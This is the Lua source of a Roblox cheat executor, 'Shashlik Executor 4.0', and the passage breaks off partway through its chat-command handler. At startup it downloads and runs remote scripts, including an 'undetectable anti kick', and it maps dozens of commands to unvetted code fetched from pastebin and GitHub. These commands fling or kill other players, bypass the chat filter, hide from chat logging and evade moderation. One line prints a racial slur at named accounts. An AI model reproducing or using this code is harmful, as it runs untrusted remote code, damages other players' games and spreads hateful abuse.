--[[
Shashlik Executor Source!!! Current Version is: 4.0
Credits to Maksimilianych228 and Gerdroid
]]
--[[ MAIN SCRIPTS ]]--
task.spawn(function()
--//fast console button
loadstring(game:HttpGet("https://pastebin.com/raw/3KcF9M0m"))()
--//undetectable anti kick
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/AdonisAntikick/refs/heads/main/Antikick"))()
end)
--[[ VARIABLES ]]--
local speaker = game.Players.LocalPlayer
local camera = workspace.CurrentCamera
local CoreGui = game:GetService("CoreGui")
local StarterGui = game:GetService("StarterGui")
local TweenService = game:GetService("TweenService")
local SoundService = game:GetService("SoundService")
local RunService = game:GetService("RunService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local UserInputService = game:GetService("UserInputService")
--[[ GUI CHECK ]]--
if CoreGui:FindFirstChild("shashlik") then
CoreGui.shashlik:Destroy()
end
--[[ PLAYER DETECTION ]]--
if speaker.Name == "prespeshnikShashlika" or speaker.Name == "MRP76REBORN" then
print("Shashlik Owner Detected!")
elseif speaker.Name == "Roblox" or speaker.Name == "Skid" then
print("Fucking Nigger Ass Retard Detected!")
end
--[[ SCREEN GUI ]]--
local shashlik = Instance.new("ScreenGui", CoreGui)
shashlik.ResetOnSpawn = false
--[[ MAIN FRAME ]]--
local frame = Instance.new("Frame", shashlik)
frame.Size = UDim2.new(0, 450, 0, 225)
frame.Position = UDim2.new(0.5, 0, 0.475, 0)
frame.AnchorPoint = Vector2.new(0.5, 0.5)
frame.BorderSizePixel = 0
frame.Visible = false
frame.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
frame.BackgroundTransparency = 0.4
local dragDetector = Instance.new("UIDragDetector", frame)
local frameCorner = Instance.new("UICorner", frame)
frameCorner.CornerRadius = UDim.new(0, 20)
local frameShadow = Instance.new("UIStroke", frame)
frameShadow.Color = Color3.fromRGB(0, 0, 0)
frameShadow.Thickness = 5
frameShadow.Transparency = 0.5
frameShadow.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
--[[ TOPFRAME ]]--
local topFrame = Instance.new("Frame", frame)
topFrame.Size = UDim2.new(1, 0, 0, 50)
topFrame.Position = UDim2.new(0, 0, 0, 0)
topFrame.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
topFrame.Visible = true -- трах трах труе
local topFrameCorner = Instance.new("UICorner", topFrame)
topFrameCorner.CornerRadius = UDim.new(0, 20)
--[[ TITLELABEL ]]--
local titleLabel = Instance.new("TextLabel", topFrame)
titleLabel.Size = UDim2.new(1, -80, 1, 0)
titleLabel.Position = UDim2.new(0, 0, 0, 0)
titleLabel.Text = "shashlik executor 4.0"
titleLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
titleLabel.BackgroundTransparency = 1
titleLabel.TextScaled = true
--[[ TITLELABEL GRADIENT ]]--
local textGradient = Instance.new("UIGradient", titleLabel)
local function lerpColor(color1, color2, alpha)
return Color3.new(
color1.R + (color2.R - color1.R) * alpha,
color1.G + (color2.G - color1.G) * alpha,
color1.B + (color2.B - color1.B) * alpha
)
end
local function animateTextGradient()
local duration = 2
local steps = 60
local stepTime = duration / steps
local color1 = Color3.fromRGB(0, 0, 255)
local color2 = Color3.fromRGB(0, 0, 0)
while true do
for i = 0, steps do
local alpha = i / steps
textGradient.Color = ColorSequence.new({
ColorSequenceKeypoint.new(0, lerpColor(color1, color2, alpha)),
ColorSequenceKeypoint.new(1, lerpColor(color2, color1, alpha))
})
task.wait(stepTime)
end
for i = 0, steps do
local alpha = i / steps
textGradient.Color = ColorSequence.new({
ColorSequenceKeypoint.new(0, lerpColor(color2, color1, alpha)),
ColorSequenceKeypoint.new(1, lerpColor(color1, color2, alpha))
})
task.wait(stepTime)
end
end
end
task.spawn(animateTextGradient)
--[[ TEXTBOX ]]--
local textBox = Instance.new("TextBox", frame)
textBox.Size = UDim2.new(0.73, 0, 0.5, 0)
textBox.Position = UDim2.new(0, 0, 0, 50)
textBox.Text = ""
textBox.TextSize = 16
textBox.PlaceholderText = "Welcome to shashlik exec! Put on textbox ;cmds and execute"
textBox.TextColor3 = Color3.fromRGB(255, 255, 255)
textBox.BackgroundColor3 = Color3.fromRGB(70, 70, 70)
textBox.BorderSizePixel = 0
textBox.TextWrapped = true
textBox.Font = Enum.Font.Code
textBox.ClearTextOnFocus = false
textBox.MultiLine = true
local textBoxCorner = Instance.new("UICorner", textBox)
textBoxCorner.CornerRadius = UDim.new(0, 10)
--[[ FPS/PING DISPLAY ]]--
local statsLabel = Instance.new("TextLabel", textBox)
statsLabel.Size = UDim2.new(0, 200, 0, 20)
statsLabel.Position = UDim2.new(1, -190, 1, -20)
statsLabel.Text = "FPS: 0 PING: 0"
statsLabel.TextSize = 14
statsLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
statsLabel.BackgroundTransparency = 1
statsLabel.FontFace = Font.new("rbxasset://fonts/families/SourceSansPro.json")
local Stats = game:GetService("Stats")
local lastUpdate = 0
RunService.RenderStepped:Connect(function(deltaTime)
task.wait(1.5)
local fps = math.floor(1 / deltaTime)
local ping = Stats.Network.ServerStatsItem["Data Ping"]:GetValueString()
statsLabel.Text = string.format("FPS: %d PING: %s", fps, ping)
end)
--[[ BUTTONS SETUP ]]--
local function createButton(size, position, text, color, parent)
local button = Instance.new("TextButton")
button.Size = size
button.Position = position
button.Text = text
button.TextSize = 15
button.BackgroundColor3 = color
button.FontFace = Font.new("rbxasset://fonts/families/SourceSansPro.json")
button.TextColor3 = Color3.fromRGB(255, 255, 255)
button.Parent = parent
local buttonCorner = Instance.new("UICorner", button)
buttonCorner.CornerRadius = UDim.new(0, 10)
return button
end
--[[ BUTTONS SOUND ]]--
local function PlayButtonSound()
local ButtonClick = Instance.new("Sound", SoundService)
ButtonClick.Name = "SHASHLIK_BUTTON_CLICK_LMAO"
ButtonClick.SoundId = "rbxasset://sounds/button.wav"
ButtonClick.Volume = 5
ButtonClick:Play()
end
--[[ BUTTONS OFFSET ]]--
local buttonWidth = 0.2
local buttonSpacing = 0.05
local buttonOffset = 0.05
local totalWidth = buttonWidth * 4 + buttonSpacing * 3
local startX = (1 - totalWidth) / 2
local verticalOffset = 0.8
--[[ VARIABLES BUTTONS ]]--
local executeButton = createButton(UDim2.new(buttonWidth, 0, 0.2, 0), UDim2.new(startX, 0, verticalOffset, 0), "Execute", Color3.fromRGB(128, 128, 128), frame)
local executeClipboardButton = createButton(UDim2.new(buttonWidth, 0, 0.2, 0), UDim2.new(startX + buttonWidth + buttonSpacing, 0, verticalOffset, 0), "Execute Clipboard", Color3.fromRGB(128, 128, 128), frame)
local consoleButton = createButton(UDim2.new(buttonWidth, 0, 0.2, 0), UDim2.new(startX + 2 * (buttonWidth + buttonSpacing), 0, verticalOffset, 0), "Console", Color3.fromRGB(128, 128, 128), frame)
local clearButton = createButton(UDim2.new(buttonWidth, 0, 0.2, 0), UDim2.new(startX + 3 * (buttonWidth + buttonSpacing), 0, verticalOffset, 0), "Clear", Color3.fromRGB(128, 128, 128), frame)
local copyButton = createButton(UDim2.new(buttonWidth, 0, 0.2, 0), UDim2.new(startX + 3 * (buttonWidth + buttonSpacing), 0, verticalOffset - 0.54, 0), "Copy", Color3.fromRGB(128, 128, 128), frame)
local pasteButton = createButton(UDim2.new(buttonWidth, 0, 0.2, 0), UDim2.new(startX + 3 * (buttonWidth + buttonSpacing), 0, verticalOffset - 0.28, 0), "Paste", Color3.fromRGB(128, 128, 128), frame)
local closeButton = createButton(UDim2.new(0, 30, 0, 30), UDim2.new(1, -35, 0, 5), "X", Color3.fromRGB(255, 0, 0), topFrame)
local minusButton = createButton(UDim2.new(0, 30, 0, 30), UDim2.new(1, -70, 0, 5), "–", Color3.fromRGB(255, 255, 0), topFrame)
--[[ TOGGLE BUTTON (BY MINI CAPY) ]]--
local DragButton = Instance.new("TextButton", shashlik)
DragButton.Name = "DragButton"
DragButton.Size = UDim2.new(0, 50, 0, 40)
DragButton.Position = UDim2.new(0.9, 0, 0.0, 0)
DragButton.BackgroundColor3 = Color3.fromRGB(0, 116, 217)
DragButton.BackgroundTransparency = 0.7
DragButton.Text = "🍢"
DragButton.TextColor3 = Color3.new(1, 1, 1)
DragButton.TextSize = 18
DragButton.BorderSizePixel = 0
DragButton.Active = true
DragButton.Draggable = true
local DragButtonCorner = Instance.new("UICorner", DragButton)
DragButtonCorner.CornerRadius = UDim.new(0.4, 0)
local DragButtonStroke = Instance.new("UIStroke", DragButton)
DragButtonStroke.Color = DragButton.BackgroundColor3
DragButtonStroke.Thickness = 2
DragButtonStroke.Transparency = 0
DragButtonStroke.LineJoinMode = Enum.LineJoinMode.Round
DragButtonStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
--[[ EXECUTOR ANIMATION ]]--
local function fadeIn(frame)
frame.Visible = true
frame.Size = UDim2.new(0, 0, 0, 0)
local tween = TweenService:Create(frame, TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { Size = UDim2.new(0, 450, 0, 225) })
tween:Play()
tween.Completed:Wait()
end
local function fadeOut(frame, callback)
local tween = TweenService:Create(frame, TweenInfo.new(0.5, Enum.EasingStyle.Quad, Enum.EasingDirection.Out), { Size = UDim2.new(0, 0, 0, 0) })
tween:Play()
tween.Completed:Wait()
frame.Visible = false
if callback then callback() end
end
--[[ TOGGLE BUTTON FUNCTIONALLY ]]--
DragButton.MouseButton1Click:Connect(function()
if frame.Visible then
fadeOut(frame)
else
fadeIn(frame)
end
end)
--[[ TOGGLE BUTTON GRADIENT ]]--
local openButtonGradient = Instance.new("UIGradient", DragButton)
openButtonGradient.Color = ColorSequence.new({
ColorSequenceKeypoint.new(0, Color3.fromRGB(0, 0, 0)),
ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 0, 255))
})
--[[ EXECUTOR COMMANDS ]]--
local commands = {
";avtor", ";gh", ";na2", ";inf", ";na1", ";le", ";tfling", ";fly", ";fly2", ";rtt", ";rkt", ";qcmd",
";tfling2", ";bp1", ";bp2", ";bp3", ";bp4", ";bp5", ";bhtool", ";mvtool", ";grtool", ";tel1", ";tel2", ";glios", ";cmds", ";hth",
";zomb", ";search", ";knpc", ";jerk", ";punch", ";invis2", ";invis", ";tel3", ";roa", ";akp1", ";akp2", ";akp3", ";keyb3", ";keyb4", ";cvb", ";ska", ";reach", ";reach2", ";hitbox",
";prox", ";rochips", ";fc1", ";fc2", ";synapse", ";synapse2", ";krnl", ";krnlk", ";bypass", ";fc3", ";rp", ";rp2", ";srp", ";srp2", ";tictactoe", ";illus", ";toolgui", ";keyb", ";wibtt", ";acl", ";krunox", ";crouch", ";srp3", ";srp4", ";tptool", ";ngp", ";sfly",
";rc7", ";cunc", ";keyb2", ";na3", ";backpack",
";krnlk (key: 9X1L9ZPAXN4)"
}
executeButton.MouseButton1Click:Connect(function()
local codeToExecute = textBox.Text
if codeToExecute == ";cmds" then
textBox.Text = "Существующие команды:\n" .. table.concat(commands, "\n") .. "\n\nНовые команды:\n;fly\n;fly2\n;qcmd\n;jerk\n;punch\n;akp1\n;akp2"
elseif codeToExecute == ";tptool" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Tptool/refs/heads/main/Tptool"))()
elseif codeToExecute == ";jerk" then
if speaker.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
-- R6
loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))()
elseif speaker.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then
-- R15
loadstring(game:HttpGet("https://pastefy.app/YZoglOyJ/raw"))()
end
elseif codeToExecute == ";synapse" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Synapse-x/refs/heads/main/Synapse%20x"))()
elseif codeToExecute == ";hitbox" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/hm5650/Hitblox/refs/heads/main/Hitblox"))()
elseif codeToExecute == ";cvb" then
loadstring(game:HttpGet("http://coolaf.com/run/snippets/h7je4skic1/raw/cvb.lua"))()
elseif codeToExecute == ";ska" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/hm5650/InstantKillig/refs/heads/main/Coolkillguithingy"))()
elseif codeToExecute == ";reach" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/wuxuin/Reach-sword/refs/heads/main/Reach%20sword"))()
elseif codeToExecute == ";reach2" then
loadstring(game:HttpGet("http://coolaf.com/run/snippets/h7i90cj5s8/raw/reach.lua"))()
elseif codeToExecute == ";sfly" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/Bac0nHck/Scripts/refs/heads/main/superman_fly.lua"))()
elseif codeToExecute == ";ngp" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/hm5650/Gravity-inverter/refs/heads/main/GI"))()
elseif codeToExecute == ";rkt" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/RTT-Tool/main/RKT%20Tool"))()
elseif codeToExecute == ";bp5" then
loadstring(game:HttpGet("https://github.com/sovetskii-shashlik/Shashlik-bring-parts/raw/refs/heads/main/Shashlik%20Bring%20Parts%20v2"))()
elseif codeToExecute == ";synapse2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/Chillz-s-scripts/main/Synapse-X-Remake.lua"))()
elseif codeToExecute == ";krnl" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/Chillz-s-scripts/refs/heads/main/KRNL%20UI%20Remake.lua"))()
elseif codeToExecute == ";mvtool" then
loadstring(game:HttpGet("https://pastefy.app/Vcuyg09O/raw"))()
elseif codeToExecute == ";krnl2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/wtfplayer/redemption/main/krnlnoui.lua"))()
elseif codeToExecute == ";krnlk" then
loadstring(game:HttpGet("https://pastebin.com/raw/DfjrwJie"))()
elseif codeToExecute == ";akp3" then
loadstring(game:HttpGet("https://pastebin.com/raw/DfjrwJie"))()
elseif codeToExecute == ";rtt" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/RTT-Tool/refs/heads/main/RTT%20Tool"))()
elseif codeToExecute == ";bhtool" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Blackhole/refs/heads/main/Blackhole"))()
elseif codeToExecute == ";bypass" then
loadstring(game:HttpGet'https://raw.githubusercontent.com/m1kp0/universal_scripts/refs/heads/main/chat_bypass.lua')()
elseif codeToExecute == ";keyb2" then
loadstring(game:HttpGet("https://github.com/ltseverydayyou/uuuuuuu/raw/refs/heads/main/VirtualKeyboard.lua"))()
elseif codeToExecute == ";na3" then
loadstring(game:HttpGet("https://github.com/ltseverydayyou/Nameless-Admin/raw/refs/heads/main/Source.lua"))()
elseif codeToExecute == ";backpack" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/rrixh/uwuware/main/Kustom/mobile5lots"))()
elseif codeToExecute == ";acl" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/AnthonyIsntHere/anthonysrepository/main/scripts/AntiChatLogger.lua"))()
elseif codeToExecute == ";srp4" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Avtor-ring-parts-Updated/refs/heads/main/Avtor%20ring%20parts"))()
elseif codeToExecute == ";qcmd" then
loadstring(game:HttpGet("https://gist.github.com/someunknowndude/38cecea5be9d75cb743eac8b1eaf6758/raw"))()
elseif codeToExecute == ";knpc" then
loadstring(game:HttpGet("https://pastebin.com/raw/DcSXwXqC"))()
elseif codeToExecute == ";grtool" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/GrabTool/refs/heads/main/GrabToolFix"))()
elseif codeToExecute == ";krunox" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Krunox-13336"))()
elseif codeToExecute == ";srp2" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Open-Source-Ring-Parts-26702"))()
elseif codeToExecute == ";toolgui" then
loadstring(game:HttpGet("https://pastebin.com/raw/ZvstfPXM"))()
elseif codeToExecute == ";srp3" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/sovetskii-shashlik/Super-ring-parts-without-massage/refs/heads/main/Super%20ring%20parts'))()
elseif codeToExecute == ";illus" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe/main/obf_11l7Y131YqJjZ31QmV5L8pI23V02b3191sEg26E75472Wl78Vi8870jRv5txZyL1.lua.txt"))()
elseif codeToExecute == ";hth" then
loadstring(game:HttpGet('https://pastefy.app/tI5b3OVD/raw'))()
elseif codeToExecute == ";bp4" then
loadstring(game:HttpGet("https://github.com/sovetskii-shashlik/Shashlik-bring-parts/raw/refs/heads/main/Shashlik%20bring%20parts"))()
elseif codeToExecute == ";rc7" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/rc7"))()
elseif codeToExecute == ";search" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/ScriptSearcher"))()
elseif codeToExecute == ";crouch" then
loadstring(game:HttpGet("https://pastebin.com/raw/sebBaBWi"))()
elseif codeToExecute == ";rp2" then
loadstring(game:HttpGet("https://pastefy.app/hdd1kF9c/raw"))("T.me/AvtorScripts")
elseif codeToExecute == ";zomb" then
loadstring(game:HttpGet('https://pastefy.app/w7KnPY70/raw'))()
elseif codeToExecute == ";rp" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Ritual-parts/refs/heads/main/Ritual%20parts%20without%20message"))()
elseif codeToExecute == ";wibtt" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/BaconBossScript/Crazy/main/Crazy'))()
elseif codeToExecute == ";keyb" then
loadstring(game:HttpGet('https://pastefy.app/Te4dwSw2/raw'))()
elseif codeToExecute == ";roa" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/randomstring0/new/refs/heads/main/cmd.lua"))() --команды rochips--
elseif codeToExecute == ";fly" then
loadstring(game:HttpGet('https://pastefy.app/M0N30XXG/raw'))()
elseif codeToExecute == ";srp" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-SUPER-RING-PARTS-V3-WITH-NO-MESSAGE-26385"))()
elseif codeToExecute == ";fc1" then
loadstring(game:HttpGet('https://pastefy.app/9CDN9Kaj/raw'))()
elseif codeToExecute == ";fc2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/CameraSpy/main/Script"))()
elseif codeToExecute == ";fc3" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Freecam'))()
elseif codeToExecute == ";fly2" then
loadstring(game:HttpGet('https://pastebin.com/raw/YSL3xKYU'))()
elseif codeToExecute == ";tfling" then
loadstring(game:HttpGet("https://pastebin.com/raw/rfKaavP3"))()
elseif codeToExecute == ";tfling2" then
loadstring(game:HttpGet('https://pastebin.com/raw/TXMNj1yy'))()
elseif codeToExecute == ";avtor" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/Avtor1zaTion/Avtor/main/AvtorHub'))()
elseif codeToExecute == ";gh" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub'))()
elseif codeToExecute == ";keyb3" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/Xxtan31/Ata/main/deltakeyboardcrack.txt"))()
elseif codeToExecute == ";keyb4" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt"))()
elseif codeToExecute == ";na2" then
loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Nameless-admin-14114"))()
elseif codeToExecute == ";tictactoe" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/refs/heads/main/Tic%20Tac%20Toe'))()
elseif codeToExecute == ";inf" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Infinite-Yield-Reborn-Legacy-21819"))()
elseif codeToExecute == ";na1" then
loadstring(game:HttpGet("https://github.com/Silly-Exploiter/NamedAdmin/raw/refs/heads/main/Script"))()
elseif codeToExecute == ";le" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Lelele-bypasser/refs/heads/main/LeLeBypasser.txt"))()
elseif codeToExecute == ";bp1" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/Bac0nHck/Scripts/main/BringFlingPlayers"))()
elseif codeToExecute == ";bp2" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Better-Bring-Parts-Ui-SOLARA-and-Fixed-Lags-21780"))()
elseif codeToExecute == ";bp3" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/GoofyBlox/GoofyZ/refs/heads/main/Best/Vortex.lua"))()
elseif codeToExecute == ";tel1" then
loadstring(game:HttpGet("https://rawscripts.net/raw/a-literal-baseplate.-FE-Telekinesis-15523"))()
elseif codeToExecute == ";tel2" then
loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/randomstring0/Qwerty/refs/heads/main/qwerty11.lua"))()
elseif codeToExecute == ";glios" then
writefile(".nonecing", "white")
loadstring(game:HttpGet('http://coolaf.com/run/snippets/gua2ntmbdm/raw/main.lua'))()
elseif codeToExecute == ";punch" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/FE/main/punch",true))()
elseif codeToExecute == ";akp1" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/ignore-touchinterests/main/main", true))()
elseif codeToExecute == ";akp2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Anti-kill-parts-updated-/refs/heads/main/Anti%20kill%20parts%20by%20Zephyr"))()
elseif codeToExecute == ";tel3" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sakupenXD/SakupScripts/main/Telekinesis"))()
elseif codeToExecute == ";invis" then
loadstring(game:HttpGet("https://pastebin.com/raw/3Rnd9rHf"))()
elseif codeToExecute == ";cunc" then
loadstring(game:HttpGet("http://coolaf.com/run/snippets/h4d9a8gprw/raw/main.lua"))()
elseif codeToExecute == ";prox" then
for i,v in ipairs(game:GetService("Workspace"):GetDescendants()) do
if v.ClassName == "ProximityPrompt" then
v.HoldDuration = 0
end
end
elseif codeToExecute == ";invis2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/CloudHub111/Scripts/refs/heads/main/Fe%20Invisible%20Beta", Beta))()
elseif codeToExecute == ";rochips" then
if "you wanna use rochips universal" then local z_x,z_z="gzrux646yj/raw/main.ts","http://coolaf.com/run/snippets/" local im,lonely,z_c=task.wait,game,loadstring z_c(lonely:HttpGet(z_z..""..z_x))() return ("This will load in about 2 - 30 seconds" or "according to your device and executor") end
else
local success, errorMessage = pcall(function()
loadstring(codeToExecute)()
end)
if not success then
error("Error string: " .. errorMessage)
end
end
PlayButtonSound()
executeButton.Text = "Executed!"
task.wait(.1)
executeButton.Text = "Execute"
end)
clearButton.MouseButton1Click:Connect(function()
textBox.Text = ""
PlayButtonSound()
clearButton.Text = "Cleared!"
task.wait(.1)
clearButton.Text = "Clear"
end)
copyButton.MouseButton1Click:Connect(function()
local textToCopy = textBox.Text
setclipboard(textToCopy)
print("Text copyed to clipboard: " .. textToCopy)
PlayButtonSound()
copyButton.Text = "Copyed!"
task.wait(.1)
copyButton.Text = "Copy"
end)
pasteButton.MouseButton1Click:Connect(function()
local clipboardText = getclipboard()
textBox.Text = clipboardText
PlayButtonSound()
pasteButton.Text = "Pasted!"
task.wait(.1)
pasteButton.Text = "Paste"
end)
closeButton.MouseButton1Click:Connect(function()
fadeOut(frame, function()
frame:Destroy()
shashlik:Destroy()
DragButton:Destroy()
end)
end)
minusButton.MouseButton1Click:Connect(function()
fadeOut(frame, function()
DragButton.Visible = true
end)
end)
frame:GetPropertyChangedSignal("Visible"):Connect(function()
if not frame.Visible then
camera.CameraType = Enum.CameraType.Custom
end
end)
executeClipboardButton.MouseButton1Click:Connect(function()
local codeToExecute = getclipboard()
local success, errorMessage = pcall(function()
loadstring(codeToExecute)()
end)
PlayButtonSound()
if not success then
print("" .. errorMessage)
end
end)
consoleButton.MouseButton1Click:Connect(function()
PlayButtonSound()
StarterGui:SetCore("DevConsoleVisible", true)
end)
local cc
cc = speaker.Chatted:Connect(function(msg)
local spaceSplit = msg:split(" ")
if spaceSplit[1] == ";tptool" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Tptool/refs/heads/main/Tptool"))()
elseif spaceSplit[1] == ";jerk" then
loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))()
loadstring(game:HttpGet("https://pastefy.app/YZoglOyJ/raw"))()
elseif spaceSplit[1] == ";qcmd" then
loadstring(game:HttpGet("https://gist.github.com/someunknowndude/38cecea5be9d75cb743eac8b1eaf6758/raw"))()
elseif spaceSplit[1] == ";krunox" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Krunox-13336"))()
elseif spaceSplit[1] == ";knpc" then
loadstring(game:HttpGet("https://pastebin.com/raw/DcSXwXqC"))()
elseif spaceSplit[1] == ";mvtool" then
loadstring(game:HttpGet("https://pastefy.app/Vcuyg09O/raw"))()
elseif spaceSplit[1] == ";grtool" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/GrabTool/refs/heads/main/GrabToolFix"))()
elseif spaceSplit[1] == ";akp3" then
loadstring(game:HttpGet("https://pastebin.com/raw/DfjrwJie"))()
elseif spaceSplit[1] == ";search" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/ScriptSearcher"))()
elseif spaceSplit[1] == ";sfly" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/Bac0nHck/Scripts/refs/heads/main/superman_fly.lua"))()
elseif spaceSplit[1] == ";illus" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/0Ben1/fe/main/obf_11l7Y131YqJjZ31QmV5L8pI23V02b3191sEg26E75472Wl78Vi8870jRv5txZyL1.lua.txt"))()
elseif spaceSplit[1] == ";hth" then
loadstring(game:HttpGet("https://pastefy.app/tI5b3OVD/raw"))()
elseif spaceSplit[1] == ";rtt" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/RTT-Tool/refs/heads/main/RTT%20Tool"))()
elseif spaceSplit[1] == ";bypass" then
loadstring(game:HttpGet'https://raw.githubusercontent.com/m1kp0/universal_scripts/refs/heads/main/chat_bypass.lua')()
elseif spaceSplit[1] == ";acl" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/AnthonyIsntHere/anthonysrepository/main/scripts/AntiChatLogger.lua"))()
elseif spaceSplit[1] == ";keyb" then
loadstring(game:HttpGet('https://pastefy.app/Te4dwSw2/raw'))()
elseif spaceSplit[1] == ";crouch" then
loadstring(game:HttpGet("https://pastebin.com/raw/sebBaBWi"))()
elseif spaceSplit[1] == ";zomb" then
loadstring(game:HttpGet("https://pastefy.app/w7KnPY70/raw"))()
elseif spaceSplit[1] == ";bp5" then
loadstring(game:HttpGet("https://github.com/sovetskii-shashlik/Shashlik-bring-parts/raw/refs/heads/main/Shashlik%20Bring%20Parts%20v2"))()
elseif spaceSplit[1] == ";fly" then
loadstring(game:HttpGet("https://pastefy.app/M0N30XXG/raw"))()
elseif spaceSplit[1] == ";fly2" then
loadstring(game:HttpGet("https://pastebin.com/raw/YSL3xKYU"))()
elseif spaceSplit[1] == ";tfling" then
loadstring(game:HttpGet("https://pastebin.com/raw/rfKaavP3"))()
elseif spaceSplit[1] == ";toolgui" then
loadstring(game:HttpGet("https://pastebin.com/raw/ZvstfPXM"))()
elseif spaceSplit[1] == ";tictactoe" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/refs/heads/main/Tic%20Tac%20Toe'))()
elseif spaceSplit[1] == ";roa" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/randomstring0/new/refs/heads/main/cmd.lua"))() --команды rochips--
elseif spaceSplit[1] == ";tfling2" then
loadstring(game:HttpGet("https://pastebin.com/raw/TXMNj1yy"))()
elseif spaceSplit[1] == ";bp4" then
loadstring(game:HttpGet("https://github.com/sovetskii-shashlik/Shashlik-bring-parts/raw/refs/heads/main/Shashlik%20bring%20parts"))()
elseif spaceSplit[1] == ";srp" then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-SUPER-RING-PARTS-V3-WITH-NO-MESSAGE-26385"))()
elseif spaceSplit[1] == ";wibtt" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/BaconBossScript/Crazy/main/Crazy'))()
elseif spaceSplit[1] == ";srp4" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Avtor-ring-parts-Updated/refs/heads/main/Avtor%20ring%20parts"))()
elseif spaceSplit[1] == ";rp" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/sovetskii-shashlik/Ritual-parts/refs/heads/main/Ritual%20parts%20without%20message"))()
elseif spaceSplit[1] == ";fc1" then
loadstring(game:HttpGet('https://pastefy.app/9CDN9Kaj/raw'))()
elseif spaceSplit[1] == ";fc2" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/CameraSpy/main/Script"))()
elseif spaceSplit[1] == ";fc3" then
loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Freecam'))()
elseif spaceSplit[1] == ";avtor" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/Avtor1zaTion/Avtor/main/AvtorHub"))()
elseif spaceSplit[1] == ";gh" then
loadstring(game:HttpGet("https://raw.githubusercontent.com/GhostPlayer352/Test4/main/GhostHub"))()
elseif spaceSplit[1] == ";na2" then
loadstring(game:HttpGet("https://scriptblox.com/raw/Universal-Script-Nameless-admin-14114"))()
